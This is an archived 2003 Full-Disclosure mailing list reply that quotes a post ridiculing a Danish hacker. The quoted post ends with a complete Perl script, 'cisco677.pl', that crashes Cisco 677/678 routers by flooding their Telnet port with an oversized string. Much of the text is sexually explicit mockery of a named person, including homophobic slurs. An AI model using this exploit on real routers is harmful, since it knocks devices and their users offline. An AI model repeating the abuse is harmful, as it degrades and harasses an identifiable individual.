lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20030721185619.03e1a3bc.tcpdumb@it-bytes.org>
From: tcpdumb at it-bytes.org (tcpdumb)
Subject: Cisco exploit

Got any erectile disfunctions?

If you'd be the best hacker in denmark, we'd know you! We at least had seen at the Chaos Communication Congress (19C3) last year december.
Go ahead and hack a tree or read a good book. *muharrharr*
Regards, 

	tcpdumb

On Mon, 21 Jul 2003 05:07:12 -0700
<dnv@...hmail.com> wrote:

> 
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> hey all.. this is i the l33t hacker DNV
> 
> i am the best hacker in denmark and i write to all of you to tell u about
> some very exciting security issues i have not found.
> 
> once i worked for a very big ISP in denmark, cybercity, where i tested
> security. I told them "1'm 1337 g1v3 m3 m0r3 m0n3y" but they did not??
> they fired me??.. i do not understand why they fired the 1337 DNV..
> 
> But i had some inside information on cybercity, other people working
> there found a security hole in cisco 667.. so i smacked my name on it
> and send it to all the big mailinglists... hahaha i showed the world
> that i am 1337.
> 
> I have a dream to get on TV like all the other 1337 hacker, so i give
> blowjobs to any jounalists that will listen to me...
> and once at a 2600 meeting, 2600 is so cool and very 1337, i meet another
> hacker and he showed me how to hack netpoint on the big hotels to get
> free internet.
> So once again i smacked my name and released it on the internet, and
> told safe2day, the most 1337 security site on the net... hahaha i showed
> all people that i am 1337.
> 
> some people say that is was a little bitch and was afraid that we would
> get in to trouble while we where fooling around with netpoint in the
> hotal lobby, and that i keept saying shit like "come on lest go, before
> someone sees us" and if i had not been for the others nothing would had
> happend... BUT THEY ARE LIEING, they heat me because i got credit for
> the hack.
> 
> To all the people at HAL2001 i was the gay dork running aroung in the
> black "the party" jacket. The party is cool the lamest gamer party in
> all of europa and sometimes i get small admin jobs.. cause after i got
> fired i got a new job installing windows boxes, that is very 1337, but
> it does not pay well.. so i have to suck alot of dick until the day i
> get real job so i can move out of my mothers house and get my one place.
> 
> Guess what.. it's time to tell you all about the newest member of #dkw-
> assstuffing, the biggest and most 1337 hacker #chan in denmark. we all
> have mad ./ skill and trade lots of warez.. DON'T FUCK WITH US!!!
> 
> welcome to moro^hning_wood.. a true hacker
> 
> his activity on Full Disclosure and his allover 1337'ness is proof that
> he is a true #asstuffing member!
> and we are looking forward to learn more about the 1337 xss that you
> master 100%moroning wood you are just to fucking 1337 we love you!!!
> 
> this is all for now, and remember if you hear the DNV is a credit stealer
> it is a lie!
> 
> - ---------------------------------------------------------------------
> - ---
> Cisco 677/678 Telnet Overflow Bug by DNV/MIRROR
> put public on www.deadbeat.dk on 5-5-2003.
> Thanks to all from DKW-ssstuffing for testing.
> 
> A warm night i was coding and lisen to some german tecno music trying
> to
> find my penis.
> 
> I've was also trying to dos hackersnacks for making me so damn fat :(
> But then I put the wrong IP into my scrip my ADSL router lost the
> Internet connection.
> 
> I had no clue what happend, so i started to play with my penis.
> 
> I asked around in #2600dk and sniffy told me that he and padde would
> stop
> assfucking and help if i send them somie pic's of my sexy naked body..
> no problem there..
> 
> i never learned what the problem was but here is a 1337 exploit
> 
> - --------------------cisco677.pl------------------
> #!/usr/bin/perl
> 
> # close your Cisco 677 up on the Telnet server!
> # Made for fun only!  port 23 is the Telnet server port on the router
> # By DNV  THX to DKW-asstuffing
> 
> use IO::Socket;
> use Getopt::Std;
> getopts('s:', \%args);
> if(!defined($args{s})){&usage; }
> $serv = $args{s};
> $foo = "?????????????????a~                %%%%%XX%%%%%"; $number = 30000;
> $data .= $foo x $number; $EOL="\015\012";
> $remote = IO::Socket::INET->new(
>                     Proto       => "tcp",
>                     PeerAddr    => $args{s},
>                     PeerPort    => "(23)",
>                 ) || die("No Telnet server here! on $args{s}\n");
> $remote->autoflush(1);
> print $remote "$data". $EOL;
> while (<$remote>){ print }
> print("\nPackets Sent\n");
> sub usage {die("\n$0 -s <server>\n\n");}
> 
> -----BEGIN PGP SIGNATURE-----
> Note: This signature can be verified at https://www.hushtools.com/verify
> Version: Hush 2.3
> 
> wkYEARECAAYFAj8b13QACgkQ4mqq9+Uor6uFggCeIlCyN1D0kwFOyPpPrPZxg09QKVYA
> oJEKwnq0dyOw2ckm2PpwRjODmCdw
> =VR6f
> -----END PGP SIGNATURE-----
> 
> 
> 
> 
> Concerned about your privacy? Follow this link to get
> FREE encrypted email: https://www.hushmail.com/?l=2
> 
> Free, ultra-private instant messaging with Hush Messenger
> https://www.hushmail.com/services.php?subloc=messenger&l=434
> 
> Promote security and make money with the Hushmail Affiliate Program: 
> https://www.hushmail.com/about.php?subloc=affiliate&l=427
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ